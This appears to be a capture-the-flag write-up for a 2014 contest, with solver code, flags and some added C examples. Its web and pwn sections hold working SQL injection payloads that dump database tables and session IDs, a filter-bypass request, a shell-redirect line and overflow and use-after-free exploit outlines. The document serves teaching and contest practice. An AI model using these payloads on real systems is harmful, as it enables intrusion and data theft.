Sasiki 2014/09/30 15:35
SJTU 0ops – September 11, 2014
Challenge source code: JCTF source.zip
RE
RE100
Throw it into dex2jar + jd-gui; in MainActivity you find:
NzU2ZDJmYzg0ZDA3YTM1NmM4ZjY4ZjcxZmU3NmUxODk=
Base64 decoding gives:
756d2fc84d07a356c8f68f71fe76e189
Google the hash and you will find a post asking: “How much is 2fc84d07a356c8f68f71fe76e189, does anyone know? I think it is 321nimda}{galflj, what do you think?”
Reversed, that string is the flag.
RE200
The offset from the MS-DOS header to the PE header should be 0xE8. In addition, the magic number of the PE header should be changed from “PE\FF\0” to “PE\0\0”. Then analyse the program: it reads 9 numbers, but only the first three need to satisfy a computation and its conditions; the middle three numbers are 80, 94, 98, the last three numbers are irrelevant, and the flag is printed from the first three numbers only.
```c
#include <stdio.h>

/* Exhaustive search for the first three numbers: k is derived from i and j,
 * and the pair must satisfy the two conditions the binary checks. */
int main( int argc, char *argv[] )
{
    for ( size_t i = 0; i < 0x100000; ++i ) {
        for ( size_t j = 0; j < 0x100000; ++j ) {
            size_t k = (i ^ j) + 4;
            if ( i * j * k / 0xb == 0x6a && (i + j + k) % 100 == 0x22 ) {
                printf( "%zu %zu %zu\n", i, j, k );
                // return 1;
            }
        }
    }
    return 0;
}
```
There are many solutions, and the program then runs a further constraint check whose logic is quite complicated. We simply tried several solutions by hand and found that the group 15, 6, 13 is the correct one.
The flag is
jlflag{15613abc}
RE300
The program cutely checks IsDebuggerPresent and exits if a debugger is found, so you need a debugger that hides itself or a manual patch. The program then reads a keyfile, converts it to a value with strtol (base 16) and XORs it with 0x19310918; the result must match a fixed value in the program. There are obviously multiple solutions, because strtol accepts input in several formats: for example 0xFFFFFFFF and FFFFFFFF convert to the same value, and leading spaces are skipped.
Finally, the correct flag is
0x181f0d1f
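The multiple-solution behaviour of strtol described above, shown as an added example (this is not code from the write-up or from the challenge binary): a lenient parse accepts every spelling that strtol normalises to the same number, while a strict parse accepts exactly one. The constant EXPECTED is derived here as flag XOR key from the two numbers in the write-up, which is an assumption; the write-up does not print the binary's stored constant.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* From the write-up: the XOR key and the accepted flag value.
 * EXPECTED = FLAG ^ XOR_KEY is an assumption about the binary's constant. */
#define XOR_KEY  0x19310918u
#define FLAG     0x181f0d1fu
#define EXPECTED (FLAG ^ XOR_KEY)   /* 0x012e0407 */

/* Lenient parse, the way the write-up says the binary reads the keyfile:
 * strtol with base 16, which skips leading whitespace and accepts a sign
 * and an optional 0x/0X prefix. Trailing line endings are tolerated. */
static int parse_key_hex(const char *text, uint32_t *out)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(text, &end, 16);
    if (end == text || errno == ERANGE) return 0;
    while (*end == '\n' || *end == '\r' || *end == ' ' || *end == '\t') end++;
    if (*end != '\0') return 0;
    *out = (uint32_t)v;
    return 1;
}

/* Strict parse: exactly 8 hex digits, no prefix, no surrounding whitespace. */
static int parse_key_strict(const char *text, uint32_t *out)
{
    if (strlen(text) != 8) return 0;
    for (int i = 0; i < 8; i++)
        if (!isxdigit((unsigned char)text[i])) return 0;
    *out = (uint32_t)strtoul(text, NULL, 16);
    return 1;
}

/* The check as the write-up describes it: key ^ 0x19310918 == constant. */
static int keyfile_accepted(const char *text)
{
    uint32_t v;
    return parse_key_hex(text, &v) && (v ^ XOR_KEY) == EXPECTED;
}

static int keyfile_accepted_strict(const char *text)
{
    uint32_t v;
    return parse_key_strict(text, &v) && (v ^ XOR_KEY) == EXPECTED;
}

/* Constructed spellings of the same number, all of which strtol normalises. */
static const char *const SPELLINGS[] = {
    "181f0d1f", "0x181f0d1f", "0X181F0D1F", "  181F0D1F", "+181f0d1f\n", "181f0d1f\r\n"
};
#define NSPELLINGS (sizeof SPELLINGS / sizeof SPELLINGS[0])

static int count_accepted(int (*check)(const char *), const char *const *list, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += check(list[i]);
    return hits;
}

int main(void)
{
    printf("lenient check accepts %d of %zu spellings\n",
           count_accepted(keyfile_accepted, SPELLINGS, NSPELLINGS), NSPELLINGS);
    printf("strict check accepts %d of %zu spellings\n",
           count_accepted(keyfile_accepted_strict, SPELLINGS, NSPELLINGS), NSPELLINGS);
    return 0;
}
```

The lenient check is the reason the challenge has many valid keyfiles; when a check is supposed to accept one canonical token, parse it with an exact-format rule rather than a general numeric converter.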
RE400
The code at 0x00422000 is transformed by some operation and then executed. I simply wrote a search program; the feature it looks for is that the last byte of the result is 0xc3, which is retn.
```c
#include <stdio.h>

/* Candidate transformation: c^num mod 0x5ED, truncated to one byte. */
unsigned char t( unsigned short c, size_t num )
{
    unsigned int result = 1;
    for ( size_t i = 0; i < num; ++i ) {
        result = c * result % 0x5ED;
    }
    return (result & 0xFF);
}

/* Encoded bytes from 0x00422000. The listing as preserved here has 134
 * entries while the search runs over 0x90 (144), so the array is sized to
 * 0x90 and the missing tail reads as zero instead of out of bounds; with the
 * truncated listing the retn check at index 0x8F cannot match. */
unsigned short Table[0x90] = {
    0x00F9, 0x02C3, 0x034B, 0x0149, 0x04E7, 0x02C3, 0x012E, 0x0570,
    0x0543, 0x0001, 0x02C3, 0x059C, 0x018C, 0x02BF, 0x054E, 0x0009,
    0x0009, 0x0543, 0x0000, 0x056E, 0x008B, 0x055B, 0x018C, 0x0234,
    0x05D9, 0x0009, 0x0009, 0x0395, 0x01A6, 0x0570, 0x0000, 0x0000,
    0x0000, 0x0000, 0x046B, 0x0294, 0x0102, 0x044E, 0x0000, 0x046B,
    0x0499, 0x027D, 0x0382, 0x05B6, 0x046B, 0x01FE, 0x01FE, 0x050D,
    0x0390, 0x046B, 0x0471, 0x037F, 0x02CA, 0x0499, 0x046B, 0x027D,
    0x033C, 0x0453, 0x01A9, 0x046B, 0x0543, 0x043D, 0x0073, 0x043D,
    0x05D2, 0x02CA, 0x0570, 0x02C3, 0x012E, 0x0570, 0x0417, 0x045D,
    0x0417, 0x005F, 0x0417, 0x00A1, 0x00FC, 0x0563, 0x012E, 0x005F,
    0x0552, 0x012F, 0x01F7, 0x03C7, 0x0417, 0x0481, 0x0001, 0x0417,
    0x02B2, 0x0001, 0x0417, 0x00A1, 0x00FC, 0x0563, 0x012E, 0x0223,
    0x03FF, 0x0035, 0x0262, 0x03FF, 0x033F, 0x0262, 0x0552, 0x012F,
    0x012E, 0x0469, 0x01FE, 0x0035, 0x0036, 0x0491, 0x0564, 0x0035,
    0x03FF, 0x01B6, 0x0009, 0x0108, 0x0035, 0x012E, 0x0330, 0x0481,
    0x0481, 0x0009, 0x03E0, 0x04A8, 0x01FE, 0x00EC, 0x0000, 0x03FF,
    0x0168, 0x03FB, 0x02B2, 0x0032, 0x01DF, 0x01B1
};

unsigned char TableNew[0x90];

int main( int argc, char *argv[] )
{
    /* try every one-byte exponent and keep the ones that end in retn */
    for ( size_t input = 0; input < 0x100; ++input ) {
        for ( size_t i = 0; i < 0x90; ++i ) {
            TableNew[i] = t( Table[i], input );
        }
        if ( TableNew[0x90 - 1] == 0xc3 ) {
            for ( size_t i = 0; i < 0x90; ++i )
                printf( "%02x ", TableNew[i] );
            printf( "\n---%zu---\n", input );
        }
    }
    return 0;
}
```
After searching, it turns out that for input = 233 the first byte of the decoded code is 0x55, which matches PUSH EBP, so that candidate is chosen; the decoded code contains the hard-coded flag
jlflag{L04e_3389_admin}
RE500
First, the APK was found to be protected with the “bong-bong” (Bangbang) packer. ZJDroid, developed by Baidu researchers, was used to unpack it and a DEX file was obtained, in which a native FindSTR method is executed. The binary reverses the input string, applies two transformations A and B, then applies two transformations C and D and compares the result with a fixed string in the binary. C and D are a bit complicated, but with IDA dynamic debugging we read out the fixed string's value after the C and D transforms; ignoring the reverse, the following code gives hEll0_Arm_W0rld
```c
#include <stdio.h>

int main( int argc, char *argv[] )
{
    /* fixed string recovered with the debugger after transforms C and D */
    char str[] = "+nv|ai|KivO:w:vr";
    char new_str[] = "+nv|ai|KivO:w:vr";

    /* undo the position permutation (transform B) */
    new_str[5]  = str[4];
    new_str[6]  = str[5];
    new_str[8]  = str[6];
    new_str[9]  = str[7];
    new_str[10] = str[8];
    new_str[13] = str[9];
    new_str[14] = str[10];
    new_str[4]  = str[11];
    new_str[7]  = str[12];
    new_str[11] = str[13];
    new_str[12] = str[14];

    /* undo the byte shift (transform A) */
    for ( size_t i = 0; i < 16; ++i ) {
        new_str[i] -= 10;
    }
    /* undo the initial reversal of the input */
    for ( size_t i = 0; i < 16; ++i ) {
        str[15 - i] = new_str[i];
    }
    puts( str );
    return 0;
}
```
WEB
WEB100
According to the vim hint in the header, a temporary file left over from vim editing may still be on the site, namely .index.html.swp
Find a picture of the Dvorak keyboard layout online and decode one character at a time, for example
[4,4] = j
[2,11] = l
[4,1,x,x] is Shift + [x,x]
WEB200
View the source of the login page:
<!--I'm lazy, so I save password into a file named password.key -->
Download the password.key file; it contains obfuscated JavaScript, which you can run directly in the browser console to get:
Password: xssbbs
Any username with the password xssbbs can log in, but you cannot log in as admin.
After logging in, I found that I could post comments. Following the XSS hint in the task, there is indeed an XSS vulnerability, but an XSS that only fires for yourself is of no use. Testing the submitted fields with a single quote revealed a SQL injection.
Because it is a comment, this is an INSERT-type injection, and it is exploited through MySQL's error reporting.
Get the databases:
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(schema_name) FROM information_schema.schemata )),0) or '&content=s
Two databases were found: information_schema and kaer
Get the table names of kaer:
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())),0) or '&content=s
There are two tables: comment and user
Get the column names of the user table:
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name='user')), 0) or '&content=s
The user table has three columns: id, username, session_id
Dump session_id directly:
title=s' or updatexml(0,(SELECT group_concat(id,0x7e,session_id) FROM user),0) or '&content=s
The admin's session_id is MTM5OTYyNzY1Mg
Continue injecting:
title=s' or updatexml(0,substring(concat(0x7e,(SELECT group_concat(username) FROM user)),30),0) or '&content=s
which gives
jlflag{1_d0nt_11k3_5q1m4p}
WEB300
Submitting ?password=flag brings up a CAPTCHA page.
Take care to set User-Agent and Referer so the requests look like normal browser traffic.
We used a distributed, crowd-sourced manual CAPTCHA solving setup.
WEB400
Note the format http://121.40.150.205/web400/?page=index; there may be a file inclusion.
Trying http://121.40.150.205/web400/index lets you download the index file.
View the login page source at http://121.40.150.205/web400/?page=test
which gives the hint
<!--action="./index.php?page=login" -->
Visit http://121.40.150.205/web400/login to get the source code.
A regex check allows only alphanumerics and underscore:
if (!preg_match('/^\w*$/m', $user) || !preg_match('/^\w*$/m', $pwd))
It can be bypassed with %0A: with the /m modifier, ^ and $ match at line boundaries, so a newline lets the rest of the value pass.
Whitespace is filtered and can be bypassed with /**/
Also follow the hint:
Humans shall pass, but bots will FAIL.
The form's submission address and the field names (name, pwd, etc.) change with the session, so a script is needed to extract these changing fields.
In addition, set the User-Agent to that of a normal browser. With that, you can script the injection.
An example submission looks like this:
o5dgNIiZMEySbuCcs3r7=t%0a%27%2F**%2For%2F** %2F1%3D1%23&7PA3h66arJomMvZjEOW8=ss
Because nothing is echoed back, this is the most basic boolean-based blind injection: on a correct guess the page redirects and shows the message “This is a test account.”
Finally, we get the flag from the user table. jlflag{a1y0u_bucu0_zh3g3d1a0}
PWN
PWN100
Connect to the server and enter the following to get an interactive shell:
sh<&4
bash >&4 2>&4
PWN200
When changing the name, the new name is appended after the previous one. There is a buffer overflow, and changing certain later locations to specific values takes the program into the branch that prints the flag
content = '\n' + '1' * 1023 + '\n' + '3' + '\n' + 'h' * 6 + '1\x00\x00\x60' + '\n'
PWN300
Do you want to get the flag?
When reading the answer to the next question, the buffer length is incremented by one: an off-by-one. It is just enough to change the variable holding the buffer length to a larger value (0xFF), so that reading the next question overflows the stack. NX is off, so you can read shellcode to a fixed address and then jump to it.
PWN400
A message is deleted once it has 256 replies, but the dangling pointer to it remains. On modify, newly entered content is allocated at the same address if its length equals the size of the structure that was just freed, so the structure can be filled with the string's contents. Modifying again triggers the use-after-free, and it is enough to call system('/bin/sh').
PWN500
The program is almost identical to PWN300, except that NX is on, so return directly to system('/bin/sh') in libc.
MISC
MISC100
Unzip the APK file (it is a zip) and find the flag in /res/raw/hehe:
ctf{adkankjasnfmasncmansddfmnasm}!
MISC200
Throw it into dex2jar + jd-gui; in the BroadcastReceiver's onReceive function:
String str = new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf("")).append('_').toString())).append('p').toString())).append('i').toString())).append('p').toString())).append('Y').toString())).append('u').toString())).append('N').toString() + 'Y';
The answer is obvious.
MISC300
The ciphertext is a Vigenère cipher, and the key shifts are 12, 11, 8, 13, 25, 14. Decrypting the ciphertext yields plaintext containing:
Here is yor flag:jlflag{I_Kn0w_n0thing}
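The decryption described above, as an added example (not the team's solver and not the challenge's own code): a Vigenère routine driven by the numeric key 12, 11, 8, 13, 25, 14 from the write-up. It assumes that only letters are shifted and advance the key index, while digits, braces and punctuation pass through unchanged; the write-up does not state that convention, so it is an assumption.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Key shifts from the write-up. */
static const int KEY[] = {12, 11, 8, 13, 25, 14};
#define KEY_LEN (sizeof KEY / sizeof KEY[0])

/* Shift letters by the key; non-letters are copied through and do not
 * consume a key position (assumption, see lead-in). `out` needs
 * strlen(in) + 1 bytes. */
static void vigenere(const char *in, char *out, int decrypt)
{
    size_t k = 0;
    size_t i;
    for (i = 0; in[i] != '\0'; i++) {
        unsigned char c = (unsigned char)in[i];
        if (isalpha(c)) {
            int base = isupper(c) ? 'A' : 'a';
            int shift = KEY[k % KEY_LEN];
            if (decrypt) shift = 26 - shift;      /* subtract modulo 26 */
            out[i] = (char)(base + ((c - base + shift) % 26));
            k++;
        } else {
            out[i] = (char)c;
        }
    }
    out[i] = '\0';
}

static void vigenere_encrypt(const char *plain, char *out) { vigenere(plain, out, 0); }
static void vigenere_decrypt(const char *cipher, char *out) { vigenere(cipher, out, 1); }

/* Encrypt then decrypt and report whether the text survives unchanged. */
static int roundtrip_ok(const char *plain)
{
    char c[256], p[256];
    if (strlen(plain) >= sizeof c) return 0;
    vigenere_encrypt(plain, c);
    vigenere_decrypt(c, p);
    return strcmp(plain, p) == 0;
}

int main(void)
{
    /* constructed sample: the flag line from the write-up, encrypted here */
    const char *plain = "Here is yor flag:jlflag{I_Kn0w_n0thing}";
    char cipher[256], recovered[256];
    vigenere_encrypt(plain, cipher);
    vigenere_decrypt(cipher, recovered);
    printf("cipher:    %s\nrecovered: %s\n", cipher, recovered);
    return 0;
}
```

With the key above, "Here" encrypts to "Tpzr" (H+12, e+11, r+8, e+13); decryption applies the complementary shift 26 - k so no negative modulo is needed.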
MISC400
Fetching the data directory with curl turns up a pcap to download.
Following http://blog.flanker017.me/actf-misc300%E5%AE%98%E6%96%B9writeup/, apply the same idea: extract the images from the adb traffic and get the flag.
MISC500
Extract the RGB value of each pixel of the original picture and take the lowest bit of every green value; the resulting data is a BMP picture with a broken header. After repairing the header, the flag is displayed.
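The green-channel LSB extraction described above, as an added example (not the team's code and not tied to the challenge image): it packs the least significant bit of every green value into bytes and then checks for the BMP magic "BM", which is the check that fails when the header is damaged. The cover image is constructed inline, the bit order (most significant bit first) is an assumption, and the embed helper exists only to build the sample.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One pixel as the write-up describes it: an RGB triple. */
typedef struct { uint8_t r, g, b; } pixel_t;

/* Pack the LSB of each green value into bytes, MSB first (assumption).
 * Returns the number of whole bytes written to `out`. */
static size_t extract_green_lsb(const pixel_t *px, size_t npx, uint8_t *out, size_t outlen)
{
    size_t nbytes = npx / 8;
    if (nbytes > outlen) nbytes = outlen;
    for (size_t i = 0; i < nbytes; i++) {
        uint8_t v = 0;
        for (int b = 0; b < 8; b++)
            v = (uint8_t)((v << 1) | (px[i * 8 + b].g & 1));
        out[i] = v;
    }
    return nbytes;
}

/* Inverse of the above; used only to construct the sample image. */
static void embed_green_lsb(pixel_t *px, size_t npx, const uint8_t *data, size_t len)
{
    for (size_t i = 0; i < len && (i + 1) * 8 <= npx; i++)
        for (int b = 0; b < 8; b++) {
            uint8_t bit = (data[i] >> (7 - b)) & 1;
            px[i * 8 + b].g = (uint8_t)((px[i * 8 + b].g & 0xFE) | bit);
        }
}

/* A BMP file starts with the two bytes "BM"; a carved file with an intact body
 * but damaged header fails this test, which is what the write-up ran into. */
static int looks_like_bmp(const uint8_t *buf, size_t len)
{
    return len >= 2 && buf[0] == 'B' && buf[1] == 'M';
}

/* Constructed sample: a 16x4 image of arbitrary colours with the first six
 * bytes of a BMP header ("BM" + little-endian size placeholder) hidden in
 * the green LSBs. Returns the number of bytes extracted into `out`. */
#define SAMPLE_W 16
#define SAMPLE_H 4
#define SAMPLE_PIXELS (SAMPLE_W * SAMPLE_H)

static size_t demo_extract(uint8_t *out, size_t outlen)
{
    pixel_t img[SAMPLE_PIXELS];
    for (size_t i = 0; i < SAMPLE_PIXELS; i++) {
        img[i].r = (uint8_t)(i * 7);
        img[i].g = (uint8_t)(0x80 + i * 3);   /* cover LSB alternates 0,1,0,1 */
        img[i].b = (uint8_t)(255 - i);
    }
    static const uint8_t hidden[] = { 'B', 'M', 0x36, 0x00, 0x00, 0x00 };
    embed_green_lsb(img, SAMPLE_PIXELS, hidden, sizeof hidden);
    return extract_green_lsb(img, SAMPLE_PIXELS, out, outlen);
}

int main(void)
{
    uint8_t out[SAMPLE_PIXELS / 8];
    size_t n = demo_extract(out, sizeof out);
    for (size_t i = 0; i < n; i++) printf("%02x ", out[i]);
    printf("\nBMP magic %s\n", looks_like_bmp(out, n) ? "present" : "missing");
    return 0;
}
```

On a real image the same loop runs over width × height pixels in row order, and the bytes after the hidden payload are just the cover's own LSB noise (here the alternating 0x55 pattern), which is why a carved file usually needs its length taken from the header rather than from the end of the data.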